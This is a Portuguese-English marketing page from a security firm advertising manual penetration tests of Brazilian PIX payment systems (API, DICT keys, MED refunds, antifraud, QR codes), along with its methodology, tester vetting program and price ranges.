Pentest PIX e DICT (Circular BACEN 3.978)
Pentest mapeado para Circular BACEN 3.978 (PIX) — DICT, MED, devolução, QR Code, fraude por engenharia social e abuse de chave.
Why now
The real pain
PIX virou alvo nº1 de fraude no BR — golpe do falso boleto, golpe da chave, MED automatizado por bot. Instituição participante responde por monitoramento de fraude (MED) e pode ser sancionada pelo BACEN. Pentest PIX manual valida controle preventivo + detectivo.
Standard and reference
/attack-surface
PIX
Every engagement is designed for your environment. The points below are part of our standard playbook for this sector — final scope is adapted to your stack and contract.
API PIX
Geração de cobrança imediata e cob-v, QR estático e dinâmico, validação de payload assinado.
DICT (chaves)
Cadastro, vinculação, portabilidade, reivindicação, abuse de scraping/enumeration.
MED (Mecanismo Especial de Devolução)
Solicitação, análise, devolução, integração com SPI.
Antifraude transacional
Score de risco, dispositivo confiável, geolocalização, valor anômalo, horário.
Open Finance PIX (Initiator)
Iniciação de pagamento via ITP, consent, redirect, retorno assinado.
QR Code malicioso
Substituição em estabelecimento físico, payload manipulado, validação no app.
/methodology
Genuinely manual pentest
Automated scanners find what's documented. Real attackers find what isn't. 90% of the work is manual — performed by specialists holding OSCP, CISSP, CRTO and GPEN.
01 · Reconnaissance
Target mapping, OSINT, footprint, sector-specific threat modeling.
02 · Discovery
Deep enumeration, complementary scanning, manual exposure identification.
03 · Exploitation
Manual validation with controlled PoC, finding chaining, escalation.
04 · Report
Executive + technical, step-by-step replication, mapped to applicable regulation.
/why-trust
Who has trusted our work
Pentest PIX em fintech, banco digital e adquirente; trabalho contínuo de monitoring de fraude.
Technical assessment recognized in highly regulated, mission-critical environments — the pentest that finds what nobody had found before.
Douglas Lopes
Founder · CEO · intrus.io
/crivo · integrity program
of pentester candidates fail our Crivo screening
Do you know who's getting access to your environment?
NDAs work in court. They don't work day-to-day. Before first access, every pentester on our team passes background, psychometric profile and integrity testing.
- In-depth criminal, fiscal and professional verification
- Psychometric assessment and risk profile
- Practical integrity testing with controlled scenarios
- Fixed team — non-rotating, no 'stranger every engagement'
/faq
FAQ — PIX
Vocês testam MED?
Sim. Auditamos fluxo de solicitação, análise, devolução, prazos regulatórios e integração SPI.
Faixa de preço?
API PIX isolada: R$ 20-45k. PIX + DICT + MED + antifraude: R$ 50-120k. PIX + Open Finance ITP: R$ 70-180k.
/contact
Cotar pentest PIX
Schedule a confidential meeting. Within 48h we'll send a proposal with scope, timeline and pricing.